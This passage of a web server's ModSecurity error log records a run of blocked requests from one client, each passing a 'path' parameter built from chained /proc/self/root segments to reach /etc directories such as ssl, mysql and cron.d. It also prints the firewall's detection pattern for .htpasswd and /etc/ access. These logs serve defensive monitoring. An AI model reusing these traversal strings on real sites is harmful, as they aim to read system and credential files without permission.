"abf4mRXjF1vJNtV6CWrl3QAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:30.695793 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:58914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4mnjZBu2q05ozVU9CiAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:31.867489 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:58922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4m3jZBu2q05ozVU9CiQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:33.185986 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:58934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4ndSswJuvopo3lOhM8QAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:39.931662 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.243.203:58948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4o3bQATo66fKoS7w5egAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:42.307063 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:39118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4pglT9VtDQc7bgUyYwQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:44.755571 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:39124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4qHbQATo66fKoS7w5fAAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:46.046644 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:39140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4qhXjF1vJNtV6CWrl3wAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:48.444364 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:39150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4rI6lpbStxTqkSktb8AAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:49.737299 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:39164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4rbysWC90G-1nBrAxywAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:58.239218 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:48032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4tv9ocpUE4ed4uDzZhAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:00.563157 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:48042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4uLysWC90G-1nBrAx0gAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:01.847970 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:41662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4ubABkC4fWIHEf8HXqAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:04.452338 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:41676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4vHjZBu2q05ozVU9CkAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:05.737201 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:41688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4vY6lpbStxTqkSktb9AAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:14.419082 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.243.203:41696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4xhXjF1vJNtV6CWrl7AAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:15.723504 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.243.203:47654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4x46lpbStxTqkSktb9QAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:17.277933 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:47662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4ybysWC90G-1nBrAx0wAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:34:19.612624 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:47674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4ynbQATo66fKoS7w5fwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:34:36.305949 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:51944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf43LysWC90G-1nBrAx6AAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:34:37.565192 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:45290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf43dSswJuvopo3lOhNAQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:34:49.123301 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:45304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf46XjZBu2q05ozVU9CnwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
